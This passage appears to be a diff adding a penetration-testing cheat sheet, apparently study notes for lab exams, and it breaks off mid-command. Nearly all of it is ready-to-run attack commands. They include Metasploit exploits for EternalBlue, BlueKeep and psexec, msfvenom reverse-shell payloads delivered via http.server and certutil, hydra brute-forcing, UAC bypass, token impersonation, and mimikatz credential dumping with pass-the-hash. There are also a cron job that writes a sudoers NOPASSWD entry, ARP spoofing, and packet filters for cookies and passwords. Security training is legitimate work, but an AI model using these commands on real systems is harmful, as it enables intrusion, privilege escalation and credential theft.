+use exploit/windows/iis/iis_webdav_upload_asp
+
+set payload windows/meterpreter/reverse_tcp
+set LHOST
+set LPORT
+
+set HttpUsername 
+set HttpPassword
+set PATH /webdav/metasploit.asp
+```
+
+**SMB**
+
+
+
+**Nmap**
+
+```
+nmap -p 445 -sV -sC
+
+nmap --script smb-vuln-ms17-010 -p 445
+```
+
+**Metasploit**
+
+```
+# Global set
+setg RHOSTS
+setg RHOST
+
+use auxiliary/scanner/smb/smb_login
+use exploit/windows/smb/psexec
+use exploit/windows/smb/ms17_010_eternalblue
+
+set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
+set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
+set VERBOSE false
+
+set SMBUser
+set SMBPass
+```
+
+```
+psexec.py @ cmd.exe
+```
+
+```
+## Manual Exploit - AutoBlue
+cd
+mkdir tools
+cd /home/kali/tools
+sudo git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
+cd AutoBlue-MS17-010
+pip install -r requirements.txt
+
+cd shellcode
+chmod +x shell_prep.sh
+./shell_prep.sh
+# LHOST = Host Kali Linux IP
+# LPORT = Port Kali will listen for the reverse shell
+
+nc -nvlp 1234 # On attacker VM
+
+cd ..
+chmod +x eternalblue_exploit7.py
+python eternalblue_exploit7.py shellcode/sc_x64.bin
+```
+
+**RDP**
+
+```
+# RDP
+nmap -sV
+```
+
+```
+## METASPLOIT
+# Global set
+setg RHOSTS
+setg RHOST
+
+use auxiliary/scanner/rdp/rdp_scanner
+use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
+
+set RPORT
+
+# ! Kernel crash may be caused ! 
+use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
+
+show targets
+set target
+set GROOMSIZE 50
+```
+
+```
+hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp:// -s
+```
+
+```
+xfreerdp /u: /p: /v::
+
+xfreerdp /u: /p: /v:: /w:1920 /h:1080 /fonts /smart-sizing
+```
+
+**WINRM**
+
+```
+# WINRM
+crackmapexec [OPTIONS]
+evil-winrm -i -u -p
+
+nmap --top-ports 7000
+nmap -sV -p 5985
+```
+
+```
+crackmapexec winrm -u -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
+
+crackmapexec winrm -u -p -x "whoami"
+crackmapexec winrm -u -p -x "systeminfo"
+```
+
+```
+# Command Shell
+evil-winrm.rb -u -p '' -i
+```
+
+```
+## METASPLOIT
+# Global set
+setg RHOSTS
+setg RHOST
+
+use exploit/windows/winrm/winrm_script_exec
+
+set USERNAME
+set PASSWORD
+set FORCE_VBS true
+```
+
+**Windows Privilege Escalation**
+
+
+
+**Kernel**
+
+```
+# WIN KERNEL
+msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o payload.exe
+
+python3 -m http.server
+# Download payload.exe on target
+```
+
+```
+## Windows-Exploit-Suggester Install
+mkdir Windows-Exploit-Suggester
+cd Windows-Exploit-Suggester
+wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py
+# ^^ This is a python3 version of the script
+
+cd Windows-Exploit-Suggester
+python ./windows-exploit-suggester.py --update
+pip install xlrd --upgrade
+
+./windows-exploit-suggester.py --database YYYY-MM-DD-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
+
+./windows-exploit-suggester.py --database YYYY-MM-DD-mssb.xlsx --systeminfo win2008r2-systeminfo.txt
+```
+
+```
+## METASPLOIT
+## Global set
+setg RHOSTS
+setg RHOST
+
+use exploit/multi/handler
+options
+set payload windows/x64/meterpreter/reverse_tcp
+set LHOST
+set LPORT
+
+use post/multi/recon/local_exploit_suggester
+set SESSION
+
+## MsfConsole Meterpreter 
Privesc +getprivs +getsystem + +# Exploitable vulnerabilities modules +exploit/windows/local/bypassuac_dotnet_profiler +exploit/windows/local/bypassuac_eventvwr +exploit/windows/local/bypassuac_sdclt +exploit/windows/local/cve_2019_1458_wizardopium +exploit/windows/local/cve_2020_1054_drawiconex_lpe +exploit/windows/local/ms10_092_schelevator +exploit/windows/local/ms14_058_track_popup_menu +exploit/windows/local/ms15_051_client_copy_image +exploit/windows/local/ms16_014_wmi_recv_notif +``` + +**UAC** + +``` +# UAC - UACME + +msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe > backdoor.exe + +## METASPLOIT - Listening +setg RHOSTS +setg RHOST + +use exploit/multi/handler +set payload windows/x64/meterpreter/reverse_tcp +set LHOST +set LPORT + +## Meterpreter (Unprivileged session) +cd C:\\ +mkdir Temp +cd Temp +upload /root/backdoor.exe +upload /root/Desktop/tools/UACME/Akagi64.exe +shell +Akagi64.exe 23 C:\Temp\backdoor.exe + +akagi32.exe [Key] [Param] +akagi64.exe [Key] [Param] + +## Elevated Meterpreter Received on the listening session +ps -S lsass.exe +migrate +hashdump +``` + +**Access Token** + +``` +# ACCESS TOKEN IMPERSONATION + +## METASPLOIT - Meterpreter (Unprivileged session) +pgrep explorer +migrate +getuid +getprivs + +load incognito +list_tokens -u +impersonate_token "ATTACKDEFENSE\Administrator" +getuid +getprivs # Access Denied +pgrep explorer +migrate +getprivs +list_tokens -u +impersonate_token "NT AUTHORITY\SYSTEM" +``` + +**Windows Credential Dumping** + + + +``` +# Exploitation +msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=1234 -f exe > payload.exe + +python -m SimpleHTTPServer 80 + +## METASPLOIT +setg RHOSTS +setg RHOST + +use exploit/multi/handler +set payload windows/x64/meterpreter/reverse_tcp +set LHOST +set LPORT +run + +## On target system +certutil -urlcache -f http:///payload.exe payload.exe +# Run payload.exe + +# METASPLOIT - Meterpreter +sysinfo +getuid +pgrep lsass +migrate +getprivs + +# Creds 
dumping - Meterpreter +load kiwi +creds_all +lsa_dump_sam +lsa_dump_secrets + +# MIMIKATZ +cd C:\\ +mkdir Temp +cd Temp +upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe +shell + +mimikatz.exe +privilege::debug +lsadump::sam +lsadump::secrets +sekurlsa::logonPasswords + +# PASS THE HASH +## sekurlsa::logonPasswords +background +search psexec +use exploit/windows/smb/psexec +set LPORT +set SMBUser Administrator +set SMBPass +exploit +``` + +``` +crackmapexec smb -u Administrator -H "" -x "whoami" +``` + +**Linux Exploitation** + + + +**Shellshock** + +``` +# BASH - APACHE +nmap -sV --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" +``` + +``` +## METASPLOIT +# Global set +setg RHOSTS +setg RHOST + +use exploit/multi/http/apache_mod_cgi_bash_env_exec +set RHOSTS +set TARGETURI /gettime.cgi +exploit +``` + +**FTP** + +``` +# FTP +ftp + +ls -lah /usr/share/nmap/scripts | grep ftp-* +searchsploit ProFTPD +``` + +``` +hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt -t 4 ftp +``` + +**SSH** + +``` +# SSH +ssh @ + +groups sysadmin +cat /etc/*release +uname -r +cat /etc/passwd +find / -name "flag" +``` + +``` +hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/common_passwords.txt -t 4 ssh +``` + +**SAMBA** + +``` +# SAMBA +smbmap -u -p '' -H + +smbclient -L -U + +enum4linux -a +enum4linux -a -u "" -p "" +``` + +``` +hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt smb +``` + +**Linux Privilege Escalation** + + + +**Kernel** + +``` +# LINUX KERNEL +## Linux-Exploit-Suggester Install +wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O linux-exploit-suggester.sh + +chmod +x linux-exploit-suggester.sh + +./linux-exploit-suggester.sh +``` + +**Cron Jobs** + +``` +# CRON +crontab -l + +find 
/ -name + +printf '#!/bin/bash\necho " ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/ +``` + +**SUID** + +``` +# SUID +file +strings + # find called binary +rm +cp /bin/bash +./ +``` + +**Linux Credential Dumping** + + + +``` +cat /etc/passwd +sudo cat /etc/shadow + +# METASPLOIT (once exploited) +use post/linux/gather/hashdump +set SESSION + +use auxiliary/analyze/crack_linux +set SHA512 true +``` + +#### Network Based Attacks + + + +**Wireshark** + + + +``` +wireshark -i eth1 + +# Filter by ip +ip.add == 10.10.10.9 + +# Filter by dest ip +ip.dest == 10.10.10.15 + +# Filter by source ip +ip.src == 10.10.16.33 + +# Filter by tcp port +tcp.port == 25 + +# Filter by ip addr and port +ip.addr == 10.10.14.22 and tcp.port == 8080 + +# Filter SYN flag +tcp.flags.syn == 1 and tcp.flags.ack ==0 + +# Broadcast filter +eth.dst == ff:ff:ff:ff:ff:ff +``` + +**TShark** + + + +``` +tshark -D +tshark -i eth1 +tshark -r .pcap +tshark -r .pcap | wc -l + +# First 100 packets +tshark -r .pcap -c 100 + +# Protocl hierarchy statistics +tshark -r .pcap -z io,phs -q + +# HTTP traffic +tshark -r .pcap -Y 'http' | more +tshark -r .pcap -Y "ip.src== && ip.dst==" + +# Only GET requests +tshark -r .pcap -Y "http.request.method==GET" + +# Packets with frame time, source IP and URL for all GET requests +tshark -r .pcap -Y "http.request.method==GET" -Tfields -e frame.time -e ip.src -e http.request.full_uri + +# Packets with a string +tshark -r .pcap -Y "http contains password" + +# Check destination IP +tshark -r .pcap -Y "http.request.method==GET && http.host==" -Tfields -e ip.dst + +# Check session ID +tshark -r .pcap -Y "ip contains amazon.in && ip.src==" -Tfields -e ip.src -e http.cookie + +# Check OS/User Agent type +tshark -r .pcap -Y "ip.src== && http" -Tfields -e http.user_agent + +# WiFi traffic filter +tshark -r .pcap -Y "wlan" + +# Only deauthentication packets +tshark -r .pcap -Y "wlan.fc.type_subtype==0x000c" +# and devices +tshark -r .pcap -Y "wlan.fc.type_subtype==0x000c" 
-Tfields -e wlan.ra + +# Only WPA handshake packets +tshark -r .pcap -Y "eapol" + +# Onyl SSID/BSSID +tshark -r .pcap -Y "wlan.fc.type_subtype==8" -Tfields -e wlan.ssid -e wlan.bssid + +tshark -r .pcap -Y "wlan.ssid==" -Tfields -e wlan.bssid + +# WiFi Channel +tshark -r .pcap -Y "wlan.ssid==" -Tfields -e wlan_radio.channel + +# Vendor & model +tshark -r .pcap -Y "wlan.ta== && http" -Tfields -e http.user_agent +``` + +``` +# ARP POISONING - arpspoof + +## Forward IP packets +echo 1 > /proc/sys/net/ipv4/ip_forward +# arpspoof -i -t -r +arpspoof -i eth1 -t -r +``` + +#### Metasploit + + + +``` +# MSF Install +sudo apt update && sudo apt install metasploit-framework -y +sudo systemctl enable postgresql +sudo systemctl restart postgresql +sudo msfdb init + +ls /usr/share/metasploit-framework +ls ~/.msf4/modules +``` + +``` +service postgresql start && msfconsole -q +``` + +``` +# msfconsole +db_status +help +version + +show -h +show all +show exploits #Aonther way to display exploits +show payloads #display payloads + +search +search cve:2017 type:exploit platform:windows +use +show options #Check options and required value +exploit #Execution of exploitation +set